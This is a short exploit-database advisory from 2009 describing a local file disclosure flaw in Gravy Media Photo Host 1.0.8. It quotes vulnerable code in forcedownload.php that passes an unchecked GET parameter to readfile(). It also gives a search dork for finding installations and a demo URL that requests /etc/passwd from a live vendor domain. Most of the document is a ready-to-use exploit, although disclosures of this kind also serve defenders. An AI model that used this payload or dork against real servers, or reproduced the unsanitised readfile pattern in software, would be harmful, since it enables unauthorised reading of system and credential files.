[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Gravy Media Photo Host 1.0.8 Local File Disclosure Vulnerability
# Published : 2009-06-22
# Author : Lo$er
# Previous Title : Campsite 3.3.0 RC1 Multiple Remote File Inclusion Vulnerabilities
# Next Title : Kasseler CMS (FD/XSS) Multiple Remote Vulnerabilities
==================================================================
=========Gravy Media Photo Host 1.0.8 Local File Inclusion========
==================================================================
Vendor:http://www.gravy-media.com/
Download:register to download
Dork:"Powered by Gravy Media"
Discovered By:Lo$er
====Vulnerable code(forcedownload.php)====
27. $filename = $_GET['file'];
70. readfile("$filename");
====Demo====
http://www.gravy-media.com/v108/forcedownload.php?file=%2Fetc%2Fpasswd
# www.Syue.com [2009-06-22]